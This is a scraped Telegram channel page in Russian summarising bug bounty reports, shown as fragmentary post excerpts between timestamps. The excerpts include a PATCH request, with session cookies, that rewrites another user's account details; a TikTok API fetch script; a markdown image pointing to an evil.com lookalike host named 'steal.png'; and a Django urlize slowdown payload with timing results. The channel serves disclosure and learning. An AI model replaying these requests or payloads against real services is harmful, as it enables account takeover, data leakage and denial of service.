🔥 Репорты простым языком - это основной канал @zaheck, где вы можете найти вдохновение и изучать чужие репорты. Если вы ищете информацию о критических ошибках и багах, то этот канал идеально подойдет для вас. Здесь вы сможете узнать о последних тенденциях в мире технологий, обсудить актуальные проблемы и делиться своим мнением с другими участниками. Подписывайтесь прямо сейчас и присоединяйтесь к обсуждениям! 🚀
28 Jan, 16:49
14 Jan, 05:55
26 Dec, 18:25
PATCH`-запрос на `/api/users/<username>/
, злоумышленник может указать новые логин, почту, телефон и имя жертвы./api/users/hacker/
:PATCH /api/users/hacker/ HTTP/1.1
Host: demo.bugbounty.bi.zone
Cookie: csrftoken=fOvoDJjDwC2exyEQGnCo1BmOZQ4RpiWj; sessionid=pwmptheyjuz3pxv8n39bh60y8pwi7jos
Content-Type: application/json
X-Csrftoken: fOvoDJjDwC2exyEQGnCo1BmOZQ4RpiWj
X-Auth-Version: v2
X-Bug-Bounty: mr4nd3r50n
{
"username": "hacker_hacked_mr4nd3r50n",
"email": "[email protected]",
"fullName": "Hacked by mr4nd3r50n",
"phone": "+79999999998",
"company": "paypal"
}
21 Dec, 09:23
onClick: function () {
Fa('self-promotion', 'live', 'live_dashboard'),
(0, de.xw)(m)
}
const fetch = require('node-fetch');
const url = 'https://*.tiktok.com/api/v1/xyz';
const postData = {
campaign_id: "0",
product_name: "",
page_index: 1,
page_size: 30,
live: false
};
const headers = {
// ... необходимые заголовки ...
};
fetch(url, {
method: 'POST',
headers: headers,
body: JSON.stringify(postData)
})
.then(response => {
if (!response.ok) {
throw new Error('error');
}
return response.json();
})
.then(data => {
console.log(data);
})
.catch(error => {
console.error('fetch error:', error);
});
{
"code": 0,
"data": {
"amount": null,
"invited_amount": 0
},
"message": "success"
}
21 Dec, 09:23
19 Dec, 09:20
https://api.standoff365.com.evil.com/image.png
![image](https://api.standoff365.com.evil.com/steal.png)
18 Dec, 19:15
import django.utils.html
from time import time
print('=== Тест urlize(".;" * n) ===')
for i in range(0, 1000000, 40000):
start = time()
PAYLOAD = ".;" * i
django.utils.html.urlize(PAYLOAD)
print(len(PAYLOAD), "\t", time() - start)
80 000 символов ~0.52 секунд
160 000 символов ~1.92 секунд
240 000 символов ~4.27 секунд
320 000 символов ~7.51 секунд
400 000 символов ~11.77 секунд
...
960 000 символов ~90+ секунд
1 040 000 символов ~106+ секунд
25 Nov, 18:35
25 Nov, 18:15
25 Nov, 18:06
16 Nov, 16:08
16 Nov, 15:54
18 Oct, 19:55
18 Oct, 19:47
18 Oct, 18:21
18 Oct, 18:11
15 Oct, 14:01
14 Oct, 17:01
14 Oct, 15:00
14 Oct, 13:00
13 Oct, 17:00
13 Oct, 14:01
13 Oct, 11:01
12 Oct, 17:01
12 Oct, 14:01
12 Oct, 11:01
10 Oct, 14:02
10 Oct, 11:00
07 Oct, 11:00